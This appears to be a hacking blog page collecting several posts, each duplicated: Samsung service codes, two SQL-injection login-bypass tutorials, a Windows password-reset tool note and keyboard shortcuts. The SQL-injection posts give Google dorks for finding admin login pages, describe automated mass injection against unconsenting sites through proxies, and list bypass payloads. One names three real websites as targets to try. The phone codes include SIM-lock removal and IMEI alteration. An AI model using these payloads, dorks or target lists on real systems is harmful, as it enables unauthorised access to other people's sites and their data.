Wednesday, 27 November 2013
Tagged under: Mobile Hacking
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)
*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
*#8999*364# -> Watchdog
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version #*0400#
#*1200# - AFC DAC Val
#*1300# - IMEI
#*1400# - IMSI
#*1700# - ( ) Command #*1700 Executed
#*1800# - ( ) Command #*1800 Executed
#*1900# - ( ) Command #*1900 Executed
#*2000# - ( ) Command #*2000 Executed
#*2100# - ( ) Command #*2100 Executed
#*2200# - ( ) Command #*2200 Executed
#*2252# - Current CAL
#*2255# -
#*2256# - Calibr.-Info
#*2282#
#*2285#
#*2286# - Databattery
#*2337# - ( ) Permanent Registration - Not Yet Implemented
#*2355#
#*2400# - ( ) Command #*2400 Executed
#*2474# - For CMD Set - DEBUGBATTERY in cihard.opt
#*2527# - GPRS Switching Set to class {4/8/9/10}
#*2558# - Time ON
#*2562#
#*2565#
#*2677# - AMR State: {None / Full Rate}
#*2679# - Copycat Feature: {ACTIVATED/DEACTIVATED}
#*2787# - CRTP {ON/OFF}
#*2834# - Audio path Mobile Normal
#*2836# - AVDDSS Management: {DEACTIVATED/ACTIVATED}
#*3230# - Trace Enable DCD disable
#*3231# - Trace disable DCD Enable
#*3232# - Current Mode {Trace enabled/DCD enabled}
#*3270# - DCS Support: {DEACTIVATED/ACTIVATED}
#*3282# - Data: {DEACTIVATED/ACTIVATED}
#*3333#
#*3353# - General Defence Code Erased
#*3370#
#*3377#
#*3476# - EGSM: {DEACTIVATED/ACTIVATED}
#*3676# - Flash Volume Formated
#*3683#
#*3737# - Some Codes
#*3777#
#*3779#
#*3825# - ( ) Command #*3825 Executed
#*3837#
#*3849#
#*3851#
#*3876#
#*3877# - Dump of SPY Trace
#*3900#
#*3940# - External looptest 9600 bps not available in SYSOL2
#*3940# - External looptest 115200 bps not available in SYSOL2
#*3941#
#*4200#
#*4263# - Handsfree Mode: ACTIVATED
#*4300#
#*4500#
#*4674# - IMSI| MCC:2 5 0 | MNC 9 2 | 10 11 91 83 50
#*4700# - Half Rate: {ACTIVATED/DEACTIVATED}
#*4760# - GSM: {ACTIVATED/DEACTIVATED}
#*4864#
#*5100#
#*5111# - ( ) Some Codes
#*5132#
#*5133# - ( ) Some Codes
#*5143#
#*5156#
#*5165#
#*5171# - ( ) Some Codes
#*5172# - ( ) Some Codes
#*5173# - ( ) Some Codes
#*5174#
#*5175#
#*5176# - ( ) Some Codes
#*5177#
#*5187# - L1C2G trace: {ACTIVATED/DEACTIVATED}
#*53696# - [Java dnload] WAPSAR mode
#*536961# - WAPSAR enable HTTP disable
#*536962# - HTTP enable WAPSAR disable
#*536963# - SERIAL enable Others disable
#*5376#
#*5400# - ( ) Command #*5400 Executed
#*5500#
#*5600#
#*566335# - [WAP model ID]
#*5663351# - [Phone Model] SAMSUNG SGH-X100
#*5663352# - [Java Model] SEC-SGHS300/1.0
#*5737425# - Java Serial
#*577699# - APN
#*5800# - ( ) Command #*5800 Executed
#*6100# - ( ) Command #*6100 Executed
#*6200#
#*6420# - Mic off
#*6421# - Mic on
#*6422# - Mic dep RXdata
#*6428# - Mic measurement
#*6700#
#*6837# - Official Software Version
#*6900#
#*7200#
#*7222# - Operation Typ: Class C GSM
#*7224# - ERROR
#*7247#
#*7252# - Operation Typ: Class B GPRS
#*7271# - Multi slot: Class 1 GPRS
#*7274# - Multi slot: Class 4 GPRS
#*7276#
#*7284# - Class B
#*7287# - GPRS Attached
#*7288# - GPRS Detached
#*7326# - Accessory: Vibrator
#*7337# - Some kind of Reset Settings
#*7352# - Some Kind of Debug Info
#*7462# - SIM phase
#*7524# - KCGPRS
#*7562# - LOCI GPRS
#*7636#
#*7639#
#*7632# - Sleep mode
#*7633#
#*7638# - RLC always open ended TBF: {ACTIVATED/DEACTIVATED}
#*7646#
#*7665#
#*7666# - SrCell Data
#*7673# - Sleep mode
#*7676# - Command #*7676 Executed
#*7683# - Sleep variable
#*7693# - Sleep deact
#*7728# - RSAV done->reset
#*7763# - SMS bearer CS {ACTIVATED/DEACTIVATED}
#*7825#
#*7828# - Midl Rl51
#*7957# - Command #*7957 Executed
#*7983# - Voltage/Freq {DEACTIVATED/ACTIVATED}
#*7986# - Voltage {DEACTIVATED/ACTIVATED}
#*8462# - Sleep time since SwitchOff
#*8465# - Time in L1
#*8466# - Old Time
#*8645#
#*9278# - Command #*9278 Executed
#*9795# - wtls key: reset
#7263867# - RAM Dump {On/Off}
#7465625*228# - Activa lock deactivated
#7465625*27*
#7465625*2827# - Auto CP lock deactivated
#7465625*28638# - Auto Network lock deactivated
#7465625*28746# - Auto SIM lock deactivated
#7465625*2877# - Auto SP lock deactivated
#7465625*28782# - Auto subset lock deactivated
#7465625*638*
#7465625*746*
#7465625*77*
#7465625*782*
#8999*324#
*#0*
*#0020# –
*#06# – IMEI
*#2255# - Call List
*#4777*8665# – GPRS
*#7465625# – Interrogate ( )
*#8377466# – Software && Hardware Versions
*#8888# – Hardware Version
*#8999*324# - ( ) Some Strange Numbers
*#8999*377# -
*#8999*3825523# - ( )
*#8999*523# - Main LCD Brightness
*#8999*636# - ( ) Another Strange Numbers
*#8999*8376363# - . HW, SW, + Some Code And Data
*#8999*8378# - . , , , HW SW
*#9999# – Software Version
=== : ===
*2767*xx927 - WAP . xx - . , xx=44: *2767*44WAP# xx=31: *2767*31WAP#
*2767*xx667 - MMS.
.
*2767*2877368#
*2767*2878# – EEPROM ( , )
*2767*31667#
*2767*31927#
*2767*33667#
*2767*33927#
*2767*34667#
*2767*34927#
*2767*351667#
*2767*351927#
*2767*3700#
*2767*380667#
*2767*380927#
*2767*3855# - l EEPROM ( SP- !! ) IMEI 447967-89-400044-0, IMEI ( )
*2767*39667#
*2767*39927#
*2767*420667#
*2767*420927#
*2767*43667#
*2767*43927#
*2767*44667#
*2767*44927#
*2767*46667#
*2767*46927#
*2767*49667#
*2767*49927#
*2767*66335#
*2767*688# ( ) [Unlocking Code]
*2767*7100#
*2767*7300#
*2767*73738927# = *2767*RESETWAP#
*2767*7650#
*2767*7667#
*2767*7927#
*2767*8200#
*2767*927#
=== / : ===
*335#
*663867# - mm file dumped
*7465625# -
*7465625*228# - Activa lock personalized
*7465625*27*
*7465625*2827# - Auto CP lock activated
*7465625*28638# - Auto Network lock activated
*7465625*28746# - Auto SIM lock activated
*7465625*2877# - Auto SP lock activated
*7465625*28782# - Auto subset lock activated
*7465625*638*
*7465625*746
*7465625*746*
*7465625*77*
*7465625*78
Mobile Codes
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)
*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
*#8999*364# -> Watchdog
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version #*0400#
#*1200# - AFC DAC Val
#*1300# - IMEI
#*1400# - IMSI
#*1700# - ( ) Command #*1700 Executed
#*1800# - ( ) Command #*1800 Executed
#*1900# - ( ) Command #*1900 Executed
#*2000# - ( ) Command #*2000 Executed
#*2100# - ( ) Command #*2100 Executed
#*2200# - ( ) Command #*2200 Executed
#*2252# - Current CAL
#*2255# -
#*2256# - Calibr.-Info
#*2282#
#*2285#
#*2286# - Databattery
#*2337# - ( ) Permanent Registration - Not Yet Implemented
#*2355#
#*2400# - ( ) Command #*2400 Executed
#*2474# - For CMD Set - DEBUGBATTERY in cihard.opt
#*2527# - GPRS Switching Set to class {4/8/9/10}
#*2558# - Time ON
#*2562#
#*2565#
#*2677# - AMR State: {None / Full Rate}
#*2679# - Copycat Feature: {ACTIVATED/DEACTIVATED}
#*2787# - CRTP {ON/OFF}
#*2834# - Audio path Mobile Normal
#*2836# - AVDDSS Management: {DEACTIVATED/ACTIVATED}
#*3230# - Trace Enable DCD disable
#*3231# - Trace disable DCD Enable
#*3232# - Current Mode {Trace enabled/DCD enabled}
#*3270# - DCS Support: {DEACTIVATED/ACTIVATED}
#*3282# - Data: {DEACTIVATED/ACTIVATED}
#*3333#
#*3353# - General Defence Code Erased
#*3370#
#*3377#
#*3476# - EGSM: {DEACTIVATED/ACTIVATED}
#*3676# - Flash Volume Formated
#*3683#
#*3737# - Some Codes
#*3777#
#*3779#
#*3825# - ( ) Command #*3825 Executed
#*3837#
#*3849#
#*3851#
#*3876#
#*3877# - Dump of SPY Trace
#*3900#
#*3940# - External looptest 9600 bps not available in SYSOL2
#*3940# - External looptest 115200 bps not available in SYSOL2
#*3941#
#*4200#
#*4263# - Handsfree Mode: ACTIVATED
#*4300#
#*4500#
#*4674# - IMSI| MCC:2 5 0 | MNC 9 2 | 10 11 91 83 50
#*4700# - Half Rate: {ACTIVATED/DEACTIVATED}
#*4760# - GSM: {ACTIVATED/DEACTIVATED}
#*4864#
#*5100#
#*5111# - ( ) Some Codes
#*5132#
#*5133# - ( ) Some Codes
#*5143#
#*5156#
#*5165#
#*5171# - ( ) Some Codes
#*5172# - ( ) Some Codes
#*5173# - ( ) Some Codes
#*5174#
#*5175#
#*5176# - ( ) Some Codes
#*5177#
#*5187# - L1C2G trace: {ACTIVATED/DEACTIVATED}
#*53696# - [Java dnload] WAPSAR mode
#*536961# - WAPSAR enable HTTP disable
#*536962# - HTTP enable WAPSAR disable
#*536963# - SERIAL enable Others disable
#*5376#
#*5400# - ( ) Command #*5400 Executed
#*5500#
#*5600#
#*566335# - [WAP model ID]
#*5663351# - [Phone Model] SAMSUNG SGH-X100
#*5663352# - [Java Model] SEC-SGHS300/1.0
#*5737425# - Java Serial
#*577699# - APN
#*5800# - ( ) Command #*5800 Executed
#*6100# - ( ) Command #*6100 Executed
#*6200#
#*6420# - Mic off
#*6421# - Mic on
#*6422# - Mic dep RXdata
#*6428# - Mic measurement
#*6700#
#*6837# - Official Software Version
#*6900#
#*7200#
#*7222# - Operation Typ: Class C GSM
#*7224# - ERROR
#*7247#
#*7252# - Operation Typ: Class B GPRS
#*7271# - Multi slot: Class 1 GPRS
#*7274# - Multi slot: Class 4 GPRS
#*7276#
#*7284# - Class B
#*7287# - GPRS Attached
#*7288# - GPRS Detached
#*7326# - Accessory: Vibrator
#*7337# - Some kind of Reset Settings
#*7352# - Some Kind of Debug Info
#*7462# - SIM phase
#*7524# - KCGPRS
#*7562# - LOCI GPRS
#*7636#
#*7639#
#*7632# - Sleep mode
#*7633#
#*7638# - RLC always open ended TBF: {ACTIVATED/DEACTIVATED}
#*7646#
#*7665#
#*7666# - SrCell Data
#*7673# - Sleep mode
#*7676# - Command #*7676 Executed
#*7683# - Sleep variable
#*7693# - Sleep deact
#*7728# - RSAV done->reset
#*7763# - SMS bearer CS {ACTIVATED/DEACTIVATED}
#*7825#
#*7828# - Midl Rl51
#*7957# - Command #*7957 Executed
#*7983# - Voltage/Freq {DEACTIVATED/ACTIVATED}
#*7986# - Voltage {DEACTIVATED/ACTIVATED}
#*8462# - Sleep time since SwitchOff
#*8465# - Time in L1
#*8466# - Old Time
#*8645#
#*9278# - Command #*9278 Executed
#*9795# - wtls key: reset
#7263867# - RAM Dump {On/Off}
#7465625*228# - Activa lock deactivated
#7465625*27*
#7465625*2827# - Auto CP lock deactivated
#7465625*28638# - Auto Network lock deactivated
#7465625*28746# - Auto SIM lock deactivated
#7465625*2877# - Auto SP lock deactivated
#7465625*28782# - Auto subset lock deactivated
#7465625*638*
#7465625*746*
#7465625*77*
#7465625*782*
#8999*324#
*#0*
*#0020# –
*#06# – IMEI
*#2255# - Call List
*#4777*8665# – GPRS
*#7465625# – Interrogate ( )
*#8377466# – Software && Hardware Versions
*#8888# – Hardware Version
*#8999*324# - ( ) Some Strange Numbers
*#8999*377# -
*#8999*3825523# - ( )
*#8999*523# - Main LCD Brightness
*#8999*636# - ( ) Another Strange Numbers
*#8999*8376363# - . HW, SW, + Some Code And Data
*#8999*8378# - . , , , HW SW
*#9999# – Software Version
=== : ===
*2767*xx927 - WAP . xx - . , xx=44: *2767*44WAP# xx=31: *2767*31WAP#
*2767*xx667 - MMS.
.
*2767*2877368#
*2767*2878# – EEPROM ( , )
*2767*31667#
*2767*31927#
*2767*33667#
*2767*33927#
*2767*34667#
*2767*34927#
*2767*351667#
*2767*351927#
*2767*3700#
*2767*380667#
*2767*380927#
*2767*3855# - l EEPROM ( SP- !! ) IMEI 447967-89-400044-0, IMEI ( )
*2767*39667#
*2767*39927#
*2767*420667#
*2767*420927#
*2767*43667#
*2767*43927#
*2767*44667#
*2767*44927#
*2767*46667#
*2767*46927#
*2767*49667#
*2767*49927#
*2767*66335#
*2767*688# ( ) [Unlocking Code]
*2767*7100#
*2767*7300#
*2767*73738927# = *2767*RESETWAP#
*2767*7650#
*2767*7667#
*2767*7927#
*2767*8200#
*2767*927#
=== / : ===
*335#
*663867# - mm file dumped
*7465625# -
*7465625*228# - Activa lock personalized
*7465625*27*
*7465625*2827# - Auto CP lock activated
*7465625*28638# - Auto Network lock activated
*7465625*28746# - Auto SIM lock activated
*7465625*2877# - Auto SP lock activated
*7465625*28782# - Auto subset lock activated
*7465625*638*
*7465625*746
*7465625*746*
*7465625*77*
*7465625*78
Tagged under: Internet Hacks
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know.....!
SQL Injection Basic Tutorial
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know.....!
Tagged under: Internet Hacks
Sub Pehly Ap Google Open Karyn
Phr Ap Google Search Bar Mein Type Karyn
inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1' OR '1'='1 (Koi Ek Dalna Ha Password Mein)
Phr Click Kryn Enter. u r in admin panel Try here
http://shopping.richardhealey.com/
http://www.amskrupajal.org/AdminLogin.asp
admin = 1'or'1'='1 pass = 1'or'1'='1
http://www.alertfx.com/admin/admin.asp
admin = 1'or'1'='1 pass = 1'or'1'='1
SQL Injection
Sub Pehly Ap Google Open Karyn
Phr Ap Google Search Bar Mein Type Karyn
inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1' OR '1'='1 (Koi Ek Dalna Ha Password Mein)
Phr Click Kryn Enter. u r in admin panel Try here
http://shopping.richardhealey.com/
http://www.amskrupajal.org/AdminLogin.asp
admin = 1'or'1'='1 pass = 1'or'1'='1
http://www.alertfx.com/admin/admin.asp
admin = 1'or'1'='1 pass = 1'or'1'='1
Tagged under: Computer Tips & Hacks
Forgot Your Windows Admin Password
This is a utility to reset the password of any user that has a valid local account on your Windows system.
Supports all Windows from NT3.5 to Win7, also 64 bit and also the Server versions (like 2003 and 2008)
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a CD or USB disk to do the password reset.
Will detect and offer to unlock locked or disabled out user accounts!
There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.
Windows stores its user information, including crypted versions of the passwords, in a file called 'sam', usually found in \windows\system32\config. This file is a part of the registry, in a binary format previously undocumented, and not easily accessible. But thanks to a German(?) named B.D, I've now made a program that understands the registry. This site provides CD and floppy images for end users to easily edit their forgotten passwords. But it also provides full source code and binary builds of the tools to allow others to use as they like for other purposes. Registry format documentation also available.
Latest release is 110511 (2011-05-11)
The following is available for download and information:
Frequently asked questions - Please read before asking questions about the passoword reset CD/floppy.
2011-05-11
Some major! new features for people using the registry utilites, but not much changes to password reset.
2009-12-01
New site, official URL is now: http://pogostick.net/~pnh/ntpasswd/
All releases still contains old mail address, please note NEW mailaddress is pnh@pogostick.net. Old mailaddress vil be invalid after January 1st 2010.
No new release, 2008-08-02 is still newest. Hope to release new early 2010.
THIS SOFTWARE COMES WITH NO WARRANTY WHATSOEVER. THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THE (MIS)USE OF THIS SOFTWARE!
Tagged under: Computer Tips & Hacks
All Keyboard Shortcut Keys. See Must
Windows Logo + R: Run dialog box
Windows Logo + M: Minimize all
SHIFT + Windows Logo+M: Undo minimize all
Windows Logo + F1: Help
Windows Logo + E: Windows Explorer
Windows Logo + F: Find files or folders
Windows Logo + D: Minimizes all open windows and displays the desktop
CTRL + Windows Logo + F: Find computer
CTRL + Windows Logo + TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
Windows Logo + TAB: Cycle through taskbar buttons
Windows Logo + Break: System Properties dialog box
Application key: Displays a shortcut menu for the selected item
Microsoft Natural Keyboard with IntelliType Software Installed:
Windows Logo + L: Log off Windows
Windows Logo + P: Starts Print Manager
Windows Logo + C: Opens Control Panel
Windows Logo + V: Starts Clipboard
Windows Logo + K: Opens Keyboard Properties dialog box
Windows Logo + I: Opens Mouse Properties dialog box
Windows Logo + A: Starts Accessibility Options (if installed)
Windows Logo + SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
Windows Logo + S: Toggles CAPS LOCK on and off
Dialog Box Keyboard Commands:
TAB: Move to the next control in the dialog box
SHIFT + TAB: Move to the previous control in the dialog box
SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
ENTER: Equivalent to clicking the selected button (the button with the outline)
ESC: Equivalent to clicking the Cancel button
ALT + underlined letter in dialog box item: Move to the corresponding item
General Keyboard-Only Commands:
F1: Starts Windows Help
F10: Activates menu bar options
SHIFT + F10: Opens a shortcut menu for the selected item (this is the same as right-clicking an object
CTRL + ESC: Opens the Start menu (use the ARROW keys to select an item)
CTRL + ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
ALT + DOWN ARROW: Opens a drop-down list box
ALT + TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
ALT + SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
ALT +- (ALT + hyphen): Displays the Multiple Document Interface (MDI)child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
CTRL + TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
ALT + underlined letter in menu: Opens the menu
ALT + F4: Closes the current window
CTRL + F4: Closes the current Multiple Document Interface (MDI) window
ALT + F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed
ALT + F6: switches between the Find dialog box and the main Notepad window)
Shell Objects and General Folder/Windows Explorer Shortcuts For a selected object:
F2: Rename object
F3: Find all files
CTRL + X: Cut
CTRL + C: Copy
CTRL + V: Paste
SHIFT + DELETE: Delete selection immediately, without moving the item to the Recycle Bin
ALT + ENTER: Open the properties for the selected object
To Copy a File: Press and hold down the CTRL key while you drag the file to another folder.
To Create a Shortcut: Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.
General Folder/Shortcut Control:
F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
F5: Refreshes the current window.
F6: Moves among panes in Windows Explorer
CTRL + G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
CTRL + Z: Undo the last command
CTRL + A: Select all the items in the current window
BACKSPACE: Switch to the parent folder
SHIFT + click + Close button: For folders, close the current folder plus all parent folders
Windows XP Shortcuts:
CODE
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
